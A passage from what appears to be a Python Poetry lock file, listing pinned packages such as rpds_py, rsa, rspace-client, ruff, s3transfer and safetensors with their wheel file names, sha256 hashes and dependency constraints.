{file = "rpds_py-0.10.6-cp39-none-win_amd64.whl", hash = "sha256:e98c4c07ee4c4b3acf787e91b27688409d918212dfd34c872201273fdd5a0e18"},
{file = "rpds_py-0.10.6-pp310-pypy310_pp73-macosx_10_7_x86_64.whl", hash = "sha256:68fe9199184c18d997d2e4293b34327c0009a78599ce703e15cd9a0f47349bba"},
{file = "rpds_py-0.10.6-pp310-pypy310_pp73-macosx_11_0_arm64.whl", hash = "sha256:3339eca941568ed52d9ad0f1b8eb9fe0958fa245381747cecf2e9a78a5539c42"},
{file = "rpds_py-0.10.6-pp310-pypy310_pp73-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:a360cfd0881d36c6dc271992ce1eda65dba5e9368575663de993eeb4523d895f"},
{file = "rpds_py-0.10.6-pp310-pypy310_pp73-manylinux_2_17_armv7l.manylinux2014_armv7l.whl", hash = "sha256:031f76fc87644a234883b51145e43985aa2d0c19b063e91d44379cd2786144f8"},
{file = "rpds_py-0.10.6-pp310-pypy310_pp73-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:1f36a9d751f86455dc5278517e8b65580eeee37d61606183897f122c9e51cef3"},
{file = "rpds_py-0.10.6-pp310-pypy310_pp73-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:052a832078943d2b2627aea0d19381f607fe331cc0eb5df01991268253af8417"},
{file = "rpds_py-0.10.6-pp310-pypy310_pp73-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:023574366002bf1bd751ebaf3e580aef4a468b3d3c216d2f3f7e16fdabd885ed"},
{file = "rpds_py-0.10.6-pp310-pypy310_pp73-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:defa2c0c68734f4a82028c26bcc85e6b92cced99866af118cd6a89b734ad8e0d"},
{file = "rpds_py-0.10.6-pp310-pypy310_pp73-musllinux_1_2_aarch64.whl", hash = "sha256:879fb24304ead6b62dbe5034e7b644b71def53c70e19363f3c3be2705c17a3b4"},
{file = "rpds_py-0.10.6-pp310-pypy310_pp73-musllinux_1_2_i686.whl", hash = "sha256:53c43e10d398e365da2d4cc0bcaf0854b79b4c50ee9689652cdc72948e86f487"},
{file = "rpds_py-0.10.6-pp310-pypy310_pp73-musllinux_1_2_x86_64.whl", hash = "sha256:3777cc9dea0e6c464e4b24760664bd8831738cc582c1d8aacf1c3f546bef3f65"},
{file = "rpds_py-0.10.6-pp38-pypy38_pp73-macosx_10_7_x86_64.whl", hash = "sha256:40578a6469e5d1df71b006936ce95804edb5df47b520c69cf5af264d462f2cbb"},
{file = "rpds_py-0.10.6-pp38-pypy38_pp73-macosx_11_0_arm64.whl", hash = "sha256:cf71343646756a072b85f228d35b1d7407da1669a3de3cf47f8bbafe0c8183a4"},
{file = "rpds_py-0.10.6-pp38-pypy38_pp73-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:10f32b53f424fc75ff7b713b2edb286fdbfc94bf16317890260a81c2c00385dc"},
{file = "rpds_py-0.10.6-pp38-pypy38_pp73-manylinux_2_17_armv7l.manylinux2014_armv7l.whl", hash = "sha256:81de24a1c51cfb32e1fbf018ab0bdbc79c04c035986526f76c33e3f9e0f3356c"},
{file = "rpds_py-0.10.6-pp38-pypy38_pp73-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:ac17044876e64a8ea20ab132080ddc73b895b4abe9976e263b0e30ee5be7b9c2"},
{file = "rpds_py-0.10.6-pp38-pypy38_pp73-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:5e8a78bd4879bff82daef48c14d5d4057f6856149094848c3ed0ecaf49f5aec2"},
{file = "rpds_py-0.10.6-pp38-pypy38_pp73-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:78ca33811e1d95cac8c2e49cb86c0fb71f4d8409d8cbea0cb495b6dbddb30a55"},
{file = "rpds_py-0.10.6-pp38-pypy38_pp73-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:c63c3ef43f0b3fb00571cff6c3967cc261c0ebd14a0a134a12e83bdb8f49f21f"},
{file = "rpds_py-0.10.6-pp38-pypy38_pp73-musllinux_1_2_aarch64.whl", hash = "sha256:7fde6d0e00b2fd0dbbb40c0eeec463ef147819f23725eda58105ba9ca48744f4"},
{file = "rpds_py-0.10.6-pp38-pypy38_pp73-musllinux_1_2_i686.whl", hash = "sha256:79edd779cfc46b2e15b0830eecd8b4b93f1a96649bcb502453df471a54ce7977"},
{file = "rpds_py-0.10.6-pp38-pypy38_pp73-musllinux_1_2_x86_64.whl", hash = "sha256:9164ec8010327ab9af931d7ccd12ab8d8b5dc2f4c6a16cbdd9d087861eaaefa1"},
{file = "rpds_py-0.10.6-pp39-pypy39_pp73-macosx_10_7_x86_64.whl", hash = "sha256:d29ddefeab1791e3c751e0189d5f4b3dbc0bbe033b06e9c333dca1f99e1d523e"},
{file = "rpds_py-0.10.6-pp39-pypy39_pp73-macosx_11_0_arm64.whl", hash = "sha256:30adb75ecd7c2a52f5e76af50644b3e0b5ba036321c390b8e7ec1bb2a16dd43c"},
{file = "rpds_py-0.10.6-pp39-pypy39_pp73-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:dd609fafdcdde6e67a139898196698af37438b035b25ad63704fd9097d9a3482"},
{file = "rpds_py-0.10.6-pp39-pypy39_pp73-manylinux_2_17_armv7l.manylinux2014_armv7l.whl", hash = "sha256:6eef672de005736a6efd565577101277db6057f65640a813de6c2707dc69f396"},
{file = "rpds_py-0.10.6-pp39-pypy39_pp73-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:6cf4393c7b41abbf07c88eb83e8af5013606b1cdb7f6bc96b1b3536b53a574b8"},
{file = "rpds_py-0.10.6-pp39-pypy39_pp73-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:ad857f42831e5b8d41a32437f88d86ead6c191455a3499c4b6d15e007936d4cf"},
{file = "rpds_py-0.10.6-pp39-pypy39_pp73-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:1d7360573f1e046cb3b0dceeb8864025aa78d98be4bb69f067ec1c40a9e2d9df"},
{file = "rpds_py-0.10.6-pp39-pypy39_pp73-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:d08f63561c8a695afec4975fae445245386d645e3e446e6f260e81663bfd2e38"},
{file = "rpds_py-0.10.6-pp39-pypy39_pp73-musllinux_1_2_aarch64.whl", hash = "sha256:f0f17f2ce0f3529177a5fff5525204fad7b43dd437d017dd0317f2746773443d"},
{file = "rpds_py-0.10.6-pp39-pypy39_pp73-musllinux_1_2_i686.whl", hash = "sha256:442626328600bde1d09dc3bb00434f5374948838ce75c41a52152615689f9403"},
{file = "rpds_py-0.10.6-pp39-pypy39_pp73-musllinux_1_2_x86_64.whl", hash = "sha256:e9616f5bd2595f7f4a04b67039d890348ab826e943a9bfdbe4938d0eba606971"},
{file = "rpds_py-0.10.6.tar.gz", hash = "sha256:4ce5a708d65a8dbf3748d2474b580d606b1b9f91b5c6ab2a316e0b0cf7a4ba50"},
]
[[package]]
name = "rsa"
version = "4.9"
description = "Pure-Python RSA implementation"
optional = true
python-versions = ">=3.6,<4"
files = [
{file = "rsa-4.9-py3-none-any.whl", hash = "sha256:90260d9058e514786967344d0ef75fa8727eed8a7d2e43ce9f4bcf1b536174f7"},
{file = "rsa-4.9.tar.gz", hash = "sha256:e38464a49c6c85d7f1351b0126661487a7e0a14a50f1675ec50eb34d4f20ef21"},
]
[package.dependencies]
pyasn1 = ">=0.1.3"
[[package]]
name = "rspace-client"
version = "2.5.0"
description = "A client for calling RSpace ELN and Inventory APIs"
optional = true
python-versions = ">=3.7.11,<4.0.0"
files = [
{file = "rspace-client-2.5.0.tar.gz", hash = "sha256:101abc83d094051d2babcaa133fa1a47221b3d5953d72eef3c331ef7084071a1"},
{file = "rspace_client-2.5.0-py3-none-any.whl", hash = "sha256:b1072df88dfa8f068f3137584d20cf135493b0521a9809c2f6ddec6b378a9cc3"},
]
[package.dependencies]
beautifulsoup4 = ">=4.9.3,<5.0.0"
requests = ">=2.25.1,<3.0.0"
[[package]]
name = "ruff"
version = "0.1.3"
description = "An extremely fast Python linter, written in Rust."
optional = false
python-versions = ">=3.7"
files = [
{file = "ruff-0.1.3-py3-none-macosx_10_7_x86_64.whl", hash = "sha256:b46d43d51f7061652eeadb426a9e3caa1e0002470229ab2fc19de8a7b0766901"},
{file = "ruff-0.1.3-py3-none-macosx_10_9_x86_64.macosx_11_0_arm64.macosx_10_9_universal2.whl", hash = "sha256:b8afeb9abd26b4029c72adc9921b8363374f4e7edb78385ffaa80278313a15f9"},
{file = "ruff-0.1.3-py3-none-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:ca3cf365bf32e9ba7e6db3f48a4d3e2c446cd19ebee04f05338bc3910114528b"},
{file = "ruff-0.1.3-py3-none-manylinux_2_17_armv7l.manylinux2014_armv7l.whl", hash = "sha256:4874c165f96c14a00590dcc727a04dca0cfd110334c24b039458c06cf78a672e"},
{file = "ruff-0.1.3-py3-none-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:eec2dd31eed114e48ea42dbffc443e9b7221976554a504767ceaee3dd38edeb8"},
{file = "ruff-0.1.3-py3-none-manylinux_2_17_ppc64.manylinux2014_ppc64.whl", hash = "sha256:dc3ec4edb3b73f21b4aa51337e16674c752f1d76a4a543af56d7d04e97769613"},
{file = "ruff-0.1.3-py3-none-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:2e3de9ed2e39160800281848ff4670e1698037ca039bda7b9274f849258d26ce"},
{file = "ruff-0.1.3-py3-none-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:1c595193881922cc0556a90f3af99b1c5681f0c552e7a2a189956141d8666fe8"},
{file = "ruff-0.1.3-py3-none-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:0f75e670d529aa2288cd00fc0e9b9287603d95e1536d7a7e0cafe00f75e0dd9d"},
{file = "ruff-0.1.3-py3-none-musllinux_1_2_aarch64.whl", hash = "sha256:76dd49f6cd945d82d9d4a9a6622c54a994689d8d7b22fa1322983389b4892e20"},
{file = "ruff-0.1.3-py3-none-musllinux_1_2_armv7l.whl", hash = "sha256:918b454bc4f8874a616f0d725590277c42949431ceb303950e87fef7a7d94cb3"},
{file = "ruff-0.1.3-py3-none-musllinux_1_2_i686.whl", hash = "sha256:d8859605e729cd5e53aa38275568dbbdb4fe882d2ea2714c5453b678dca83784"},
{file = "ruff-0.1.3-py3-none-musllinux_1_2_x86_64.whl", hash = "sha256:0b6c55f5ef8d9dd05b230bb6ab80bc4381ecb60ae56db0330f660ea240cb0d4a"},
{file = "ruff-0.1.3-py3-none-win32.whl", hash = "sha256:3e7afcbdcfbe3399c34e0f6370c30f6e529193c731b885316c5a09c9e4317eef"},
{file = "ruff-0.1.3-py3-none-win_amd64.whl", hash = "sha256:7a18df6638cec4a5bd75350639b2bb2a2366e01222825562c7346674bdceb7ea"},
{file = "ruff-0.1.3-py3-none-win_arm64.whl", hash = "sha256:12fd53696c83a194a2db7f9a46337ce06445fb9aa7d25ea6f293cf75b21aca9f"},
{file = "ruff-0.1.3.tar.gz", hash = "sha256:3ba6145369a151401d5db79f0a47d50e470384d0d89d0d6f7fab0b589ad07c34"},
]
[[package]]
name = "s3transfer"
version = "0.7.0"
description = "An Amazon S3 Transfer Manager"
optional = true
python-versions = ">= 3.7"
files = [
{file = "s3transfer-0.7.0-py3-none-any.whl", hash = "sha256:10d6923c6359175f264811ef4bf6161a3156ce8e350e705396a7557d6293c33a"},
{file = "s3transfer-0.7.0.tar.gz", hash = "sha256:fd3889a66f5fe17299fe75b82eae6cf722554edca744ca5d5fe308b104883d2e"},
]
[package.dependencies]
botocore = ">=1.12.36,<2.0a.0"
[package.extras]
crt = ["botocore[crt] (>=1.20.29,<2.0a.0)"]
[[package]]
name = "safetensors"
version = "0.4.0"
description = ""
optional = true
python-versions = ">=3.7"
files = [
{file = "safetensors-0.4.0-cp310-cp310-macosx_10_7_x86_64.whl", hash = "sha256:2289ae6dbe6d027ecee016b28ced13a2e21a0b3a3a757a23033a2d1c0b1bad55"},
{file = "safetensors-0.4.0-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:bf6458959f310f551cbbeef2255527ade5f783f952738e73e4d0136198cc3bfe"},
{file = "safetensors-0.4.0-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:b6b60a58a8f7cc7aed3b5b73dce1f5259a53c83d9ba43a76a874e6ad868c1b4d"},
{file = "safetensors-0.4.0-cp310-cp310-manylinux_2_17_armv7l.manylinux2014_armv7l.whl", hash = "sha256:491b3477e4d0d4599bb75d79da4b75af2e6ed9b1f6ec2b715991f0bc927bf09a"},
{file = "safetensors-0.4.0-cp310-cp310-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:59d2e10b7e0cd18bb73ed7c17c624a5957b003b81345e18159591771c26ee428"},
{file = "safetensors-0.4.0-cp310-cp310-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:3f667a4c12fb593f5f66ce966cb1b14a7148898b2b1a7f79e0761040ae1e3c51"},
{file = "safetensors-0.4.0-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:5f9909512bcb6f712bdd04c296cdfb0d8ff73d258ffc5af884bb62ea02d221e0"},
{file = "safetensors-0.4.0-cp310-cp310-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:d33d29e846821f0e4f92614022949b09ccf063cb36fe2f9fe099cde1efbfbb87"},
{file = "safetensors-0.4.0-cp310-cp310-musllinux_1_1_aarch64.whl", hash = "sha256:4d512525a8e05a045ce6698066ba0c5378c174a83e0b3720a8c7799dc1bb06f3"},
{file = "safetensors-0.4.0-cp310-cp310-musllinux_1_1_x86_64.whl", hash = "sha256:0219cea445177f6ad1f9acd3a8d025440c8ff436d70a4a7c7ba9c36066aa9474"},
{file = "safetensors-0.4.0-cp310-none-win32.whl", hash = "sha256:67ab171eeaad6972d3971c53d29d53353c67f6743284c6d637b59fa3e54c8a94"},
{file = "safetensors-0.4.0-cp310-none-win_amd64.whl", hash = "sha256:7ffc736039f08a9ca1f09816a7481b8e4469c06e8f8a5ffa8cb67ddd79e6d77f"},
{file = "safetensors-0.4.0-cp311-cp311-macosx_10_7_x86_64.whl", hash = "sha256:4fe9e3737b30de458225a23926219ca30b902ee779b6a3df96eaab2b6d625ec2"},
{file = "safetensors-0.4.0-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:e7916e814a90008de767b1c164a1d83803693c661ffe9af5a697b22e2752edb0"},
{file = "safetensors-0.4.0-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:cbc4a4da01143472323c145f3c289e5f6fabde0ac0a3414dabf912a21692fff4"},
{file = "safetensors-0.4.0-cp311-cp311-manylinux_2_17_armv7l.manylinux2014_armv7l.whl", hash = "sha256:a54c21654a47669b38e359e8f852af754b786c9da884bb61ad5e9af12bd71ccb"},
{file = "safetensors-0.4.0-cp311-cp311-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:25cd407955bad5340ba17f9f8ac789a0d751601a311e2f7b2733f9384478c95e"},
{file = "safetensors-0.4.0-cp311-cp311-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:82e8fc4e3503cd738fd40718a430fe0e5ce6e7ff91a73d6ce628bbb89c41e8ce"},
{file = "safetensors-0.4.0-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:48b92059b1a4ad163024d4f526e0e73ebe2bb3ae70537e15e347820b4de5dc27"},
{file = "safetensors-0.4.0-cp311-cp311-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:5daa05058f7dce85b5f9f60c4eab483ed7859d63978f08a76e52e78859ff20ca"},
{file = "safetensors-0.4.0-cp311-cp311-musllinux_1_1_aarch64.whl", hash = "sha256:a86565a5c112dd855909e20144947b4f53abb78c4de207f36ca71ee63ba5b90d"},
{file = "safetensors-0.4.0-cp311-cp311-musllinux_1_1_x86_64.whl", hash = "sha256:38032078ed9fea52d06584e441bccc73fb475c4581600c6d6166de2fe2deb3d1"},
{file = "safetensors-0.4.0-cp311-none-win32.whl", hash = "sha256:2f99d90c91b7c76b40a862acd9085bc77f7974a27dee7cfcebe46149af5a99a1"},
{file = "safetensors-0.4.0-cp311-none-win_amd64.whl", hash = "sha256:74e2a448ffe19be188b457b130168190ee73b5a75e45ba96796320c1f5ae35d2"},
{file = "safetensors-0.4.0-cp312-cp312-macosx_10_7_x86_64.whl", hash = "sha256:1e2f9c69b41d03b4826ffb96b29e07444bb6b34a78a7bafd0b88d59e8ec75b8a"},
{file = "safetensors-0.4.0-cp312-cp312-macosx_11_0_arm64.whl", hash = "sha256:3910fb5bf747413b59f1a34e6d2a993b589fa7d919709518823c70efaaa350bd"},
{file = "safetensors-0.4.0-cp312-cp312-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:cf8fdca709b2470a35a59b1e6dffea75cbe1214b22612b5dd4c93947697aea8b"},
{file = "safetensors-0.4.0-cp312-cp312-manylinux_2_17_armv7l.manylinux2014_armv7l.whl", hash = "sha256:2f27b8ef814c5fb43456caeb7f3cbb889b76115180aad1f42402839c14a47c5b"},
{file = "safetensors-0.4.0-cp312-cp312-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:7b2d6101eccc43c7be0cb052f13ceda64288b3d8b344b988ed08d7133cbce2f3"},
{file = "safetensors-0.4.0-cp312-cp312-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:fdc34027b545a69be3d4220c140b276129523e4e46db06ad1a0b60d6a4cf9214"},
{file = "safetensors-0.4.0-cp312-cp312-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:db7bb48ca9e90bb9526c71b388d38d8de160c0354f4c5126df23e8701a870dcb"},
{file = "safetensors-0.4.0-cp312-cp312-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:a78ffc0795d3595cd9e4d453502e35f764276c49e434b25556a15a337db4dafc"},
{file = "safetensors-0.4.0-cp312-cp312-musllinux_1_1_aarch64.whl", hash = "sha256:8e735b0f79090f6855b55e205e820b7b595502ffca0009a5c13eef3661ce465b"},
{file = "safetensors-0.4.0-cp312-cp312-musllinux_1_1_x86_64.whl", hash = "sha256:f8d2416734e850d5392afffbcb2b8985ea29fb171f1cb197e2ae51b8e35d6438"},
{file = "safetensors-0.4.0-cp37-cp37m-macosx_10_7_x86_64.whl", hash = "sha256:e853e189ba7d47eaf561094586692ba2bbdd258c096f1755805cac098de0e6ab"},
{file = "safetensors-0.4.0-cp37-cp37m-macosx_11_0_arm64.whl", hash = "sha256:4b2aa57b5a4d576f3d1dd6e56980026340f156f8a13c13016bfac4e25295b53f"},
{file = "safetensors-0.4.0-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:3b6c1316ffde6cb4bf22c7445bc9fd224b4d1b9dd7320695f5611c89e802e4b6"},
{file = "safetensors-0.4.0-cp37-cp37m-manylinux_2_17_armv7l.manylinux2014_armv7l.whl", hash = "sha256:003077ec85261d00061058fa12e3c1d2055366b02ce8f2938929359ffbaff2b8"},
{file = "safetensors-0.4.0-cp37-cp37m-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:bd63d83a92f1437a8b0431779320376030ae43ace980bea5686d515de0784100"},
{file = "safetensors-0.4.0-cp37-cp37m-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:2077801800b4b13301d8d6290c7fb5bd60737320001717153ebc4371776643b5"},
{file = "safetensors-0.4.0-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:7abe0e157a49a75aeeccfbc4f3dac38d8f98512d3cdb35c200f8e628dc5773cf"},
{file = "safetensors-0.4.0-cp37-cp37m-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:3bfed574f6b1e7e7fe1f17213278875ef6c6e8b1582ab6eda93947db1178cae6"},
{file = "safetensors-0.4.0-cp37-cp37m-musllinux_1_1_aarch64.whl", hash = "sha256:964ef166a286ce3b023d0d0bd0e21d440a1c8028981c8abdb136bc7872ba9b3d"},
{file = "safetensors-0.4.0-cp37-cp37m-musllinux_1_1_x86_64.whl", hash = "sha256:44f84373e42183bd56a13a1f2d8acb1db7fedaeffbd83e79cec861477eee1af4"},
{file = "safetensors-0.4.0-cp37-none-win32.whl", hash = "sha256:c68132727dd86fb641102e494d445f705efe402f4d5e24b278183a15499ab400"},
{file = "safetensors-0.4.0-cp37-none-win_amd64.whl", hash = "sha256:1db87155454c168aef118d5657a403aee48a4cb08d8851a981157f07351ea317"},
{file = "safetensors-0.4.0-cp38-cp38-macosx_10_7_x86_64.whl", hash = "sha256:9e583fa68e5a07cc859c4e13c1ebff12029904aa2e27185cf04a1f57fe9a81c4"},
{file = "safetensors-0.4.0-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:73e7696dcf3f72f99545eb1abe6106ad65ff1f62381d6ce4b34be3272552897a"},
{file = "safetensors-0.4.0-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:4936096a57c62e84e200f92620a536be067fc5effe46ecc7f230ebb496ecd579"},
{file = "safetensors-0.4.0-cp38-cp38-manylinux_2_17_armv7l.manylinux2014_armv7l.whl", hash = "sha256:87b328ee1591adac332543e1f5fc2c2d7f149b745ebb0d58d7850818ff9cee27"},
{file = "safetensors-0.4.0-cp38-cp38-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:b69554c143336256260eceff1d3c0969172a641b54d4668489a711b05f92a2c0"},
{file = "safetensors-0.4.0-cp38-cp38-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:3ebf6bcece5d5d1bd6416472f94604d2c834ca752ac60ed42dba7157e595a990"},
{file = "safetensors-0.4.0-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:6686ce01b8602d55a7d9903c90d4a6e6f90aeb6ddced7cf4605892d0ba94bcb8"},
{file = "safetensors-0.4.0-cp38-cp38-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:9b8fd6cc2f3bda444a048b541c843c7b7fefc89c4120d7898ea7d5b026e93891"},
{file = "safetensors-0.4.0-cp38-cp38-musllinux_1_1_aarch64.whl", hash = "sha256:8a6abfe67692f81b8bdb99c837f28351c17e624ebf136970c850ee989c720446"},
{file = "safetensors-0.4.0-cp38-cp38-musllinux_1_1_x86_64.whl", hash = "sha256:27a24ca8822c469ee452db4c13418ba983315a0d863c018a9af15f2305eac38c"},
{file = "safetensors-0.4.0-cp38-none-win32.whl", hash = "sha256:c4a0a47c8640167792d8261ee21b26430bbc39130a7edaad7f4c0bc05669d00e"},
{file = "safetensors-0.4.0-cp38-none-win_amd64.whl", hash = "sha256:a738970a367f39249e2abb900d9441a8a86d7ff50083e5eaa6e7760a9f216014"},
{file = "safetensors-0.4.0-cp39-cp39-macosx_10_7_x86_64.whl", hash = "sha256:806379f37e1abd5d302288c4b2f4186dd7ea7143d4c7811f90a8077f0ae8967b"},
{file = "safetensors-0.4.0-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:2b9b94133ed2ae9dda0e95dcace7b7556eba023ffa4c4ae6df8f99377f571d6a"},
{file = "safetensors-0.4.0-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:6b563a14c43614815a6b524d2e4edeaace50b717f7e7487bb227dd5b68350f5a"},
{file = "safetensors-0.4.0-cp39-cp39-manylinux_2_17_armv7l.manylinux2014_armv7l.whl", hash = "sha256:00a9b157be660fb7ba88fa2eedd05ec93793a5b61e43e783e10cb0b995372802"},
{file = "safetensors-0.4.0-cp39-cp39-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:c8f194f45ab6aa767993c24f0aeb950af169dbc5d611b94c9021a1d13b8a1a34"},
{file = "safetensors-0.4.0-cp39-cp39-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:469360b9451db10bfed3881378d5a71b347ecb1ab4f42367d77b8164a13af70b"},
{file = "safetensors-0.4.0-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:f5f75fa97ccf32a3c7af476c6a0e851023197d3c078f6de3612008fff94735f9"},
{file = "safetensors-0.4.0-cp39-cp39-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:acf0180283c2efae72f1d8c0a4a7974662091df01be3aa43b5237b1e52ed0a01"},
{file = "safetensors-0.4.0-cp39-cp39-musllinux_1_1_aarch64.whl", hash = "sha256:cd02b495ba0814619f40bda46771bb06dbbf1d42524b66fa03b2a736c77e4515"},
{file = "safetensors-0.4.0-cp39-cp39-musllinux_1_1_x86_64.whl", hash = "sha256:c42bdea183dbaa99e2f0e6120dc524df79cf4289a6f90f30a534444ef20f49fa"},
{file = "safetensors-0.4.0-cp39-none-win32.whl", hash = "sha256:cef7bb5d9feae7146c3c3c7b3aef7d2c8b39ba7f5ff4252d368eb69462a47076"},
{file = "safetensors-0.4.0-cp39-none-win_amd64.whl", hash = "sha256:79dd46fb1f19282fd12f544471efb97823ede927cedbf9cf35550d92b349fdd2"},
{file = "safetensors-0.4.0-pp310-pypy310_pp73-macosx_10_7_x86_64.whl", hash = "sha256:002301c1afa32909f83745b0c124d002e7ae07e15671f3b43cbebd0ffc5e6037"},
{file = "safetensors-0.4.0-pp310-pypy310_pp73-macosx_11_0_arm64.whl", hash = "sha256:67762d36ae088c73d4a3c96bfc4ea8d31233554f35b6cace3a18533238d462ea"},
{file = "safetensors-0.4.0-pp310-pypy310_pp73-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:0f45230f20a206e5e4c7f7bbf9342178410c6f8b0af889843aa99045a76f7691"},
{file = "safetensors-0.4.0-pp310-pypy310_pp73-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:8f2ca939bbd8fb2f4dfa28e39a146dad03bc9325e9fc831b68f7b98f69a5a2f1"},
{file = "safetensors-0.4.0-pp310-pypy310_pp73-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:61a00f281391fae5ce91df70918bb61c12d2d514a493fd8056e12114be729911"},
{file = "safetensors-0.4.0-pp310-pypy310_pp73-musllinux_1_1_aarch64.whl", hash = "sha256:435fd136a42492b280cb55126f9ce9535b35dd49df2c5d572a5945455a439448"},
{file = "safetensors-0.4.0-pp310-pypy310_pp73-musllinux_1_1_x86_64.whl", hash = "sha256:f0daa788273d683258fb1e4a5e16bef4486b2fca536451a2591bc0f4a6488895"},
{file = "safetensors-0.4.0-pp37-pypy37_pp73-macosx_10_7_x86_64.whl", hash = "sha256:0620ab0d41e390ccb1c4ea8f63dc00cb5f0b96a5cdd3cd0d64c21765720c074a"},
{file = "safetensors-0.4.0-pp37-pypy37_pp73-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:bc1fa8d067733cb67f22926689ee808f08afacf7700d2ffb44efae90a0693eb1"},
{file = "safetensors-0.4.0-pp37-pypy37_pp73-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:dcaa40bc363edda145db75cd030f3b1822e5478d550c3500a42502ecef32c959"},
{file = "safetensors-0.4.0-pp37-pypy37_pp73-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:b561fbc044db7beff2ece0ec219a291809d45a38d30c6b38e7cc46482582f4ba"},
{file = "safetensors-0.4.0-pp37-pypy37_pp73-musllinux_1_1_aarch64.whl", hash = "sha256:79a983b09782dacf9a1adb19bb98f4a8f6c3144108939f572c047b5797e43cf5"},
{file = "safetensors-0.4.0-pp37-pypy37_pp73-musllinux_1_1_x86_64.whl", hash = "sha256:10b65cd3ad79f5d0daf281523b4146bc271a34bb7430d4e03212e0de8622dab8"},
{file = "safetensors-0.4.0-pp38-pypy38_pp73-macosx_10_7_x86_64.whl", hash = "sha256:114decacc475a6a9e2f9102a00c171d113ddb5d35cb0bda0db2c0c82b2eaa9ce"},
{file = "safetensors-0.4.0-pp38-pypy38_pp73-macosx_11_0_arm64.whl", hash = "sha256:72ddb741dd5fe42521db76a70e012f76995516a12e7e0ef26be03ea9be77802a"},
{file = "safetensors-0.4.0-pp38-pypy38_pp73-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:6c5556c2ec75f5a6134866eddd7341cb36062e6edaea343478a279591b63ddba"},
{file = "safetensors-0.4.0-pp38-pypy38_pp73-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:ed50f239b0ce7ae85b078395593b4a351ede7e6f73af25f4873e3392336f64c9"},
{file = "safetensors-0.4.0-pp38-pypy38_pp73-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:495dcaea8fbab70b927d2274e2547824462737acbf98ccd851a71124f779a5c6"},
{file = "safetensors-0.4.0-pp38-pypy38_pp73-musllinux_1_1_aarch64.whl", hash = "sha256:3f4d90c79a65ba2fe2ff0876f6140748f0a3ce6a21e27a35190f4f96321803f8"},
{file = "safetensors-0.4.0-pp38-pypy38_pp73-musllinux_1_1_x86_64.whl", hash = "sha256:7a524382b5c55b5fbb168e0e9d3f502450c8cf3fb81b93e880018437c206a482"},
